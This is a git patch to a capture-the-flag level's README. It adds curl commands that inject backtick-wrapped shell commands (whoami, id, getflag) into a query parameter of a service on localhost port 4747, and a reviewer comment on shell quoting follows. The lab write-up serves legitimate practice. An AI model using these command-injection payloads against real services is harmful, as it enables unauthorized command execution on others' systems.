From c6a6c796cb428c4a99602374dc4f9aad9a41eb61 Mon Sep 17 00:00:00 2001 From: "nuo.o" <49533950+nuoxoxo@users.noreply.github.com> Date: Sun, 17 Nov 2024 21:09:17 +0100 Subject: [PATCH] Update and rename README.mdx to README.md --- level04/{README.mdx => README.md} | 15 ++++++++++++++- 1 file changed, 14 insertions(+), 1 deletion(-) rename level04/{README.mdx => README.md} (71%) diff --git a/level04/README.mdx b/level04/README.md similarity index 71% rename from level04/README.mdx rename to level04/README.md index e2acc50..05e11dd 100644 --- a/level04/README.mdx +++ b/level04/README.md @@ -42,5 +42,18 @@ Solution z: scan if a port is open (a listening daemon) Connection to localhost 4747 port [tcp/*] succeeded! -> curl localhost:4747/?x="\`/bin/getflag\`" +# eg. +> curl localhost:4747/?x="\`/usr/bin/whoami\`" +> curl localhost:4747/?x="\`/usr/bin/id\`" +> curl localhost:4747/?x="\`/bin/hostname\`" +> curl localhost:4747/?x="\`/bin/pwd\`" +> curl localhost:4747/?x="\`/bin/df\`" + +# avoid typing realpath out +> curl localhost:4747/?x="\`$(which pwd)\`" 🟢 +or +> curl localhost:4747/?x="\`$(whereis pwd|awk '{print $2}')\`" + +# solve +> curl localhost:4747/?x="\`$(which getflag)\`" ```
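Review bot: In the added "avoid typing realpath out" and "solve" lines, `$(which pwd)`, `$(whereis pwd|awk '{print $2}')` and `$(which getflag)` sit inside double quotes without a backslash, so the shell that runs curl expands them before the request is sent, while the escaped backticks are passed through literally. The path is therefore resolved with the client's PATH, and it matches what the daemon sees only because both sides are on localhost; a one-line `#` comment saying so would keep readers from assuming the lookup happens on the service side. In the same block, the trailing 🟢 after the closing quote on the `which pwd` line becomes a second argument to curl if the line is copied as written, and the bare "or" has no `#` prefix unlike the other annotations; suggest moving the marker into a `#` comment and writing `# or`. The `?` in `localhost:4747/?x=` is outside the quotes in every added command, so a shell that errors on unmatched globs (zsh by default) will reject them; quoting the whole URL avoids that.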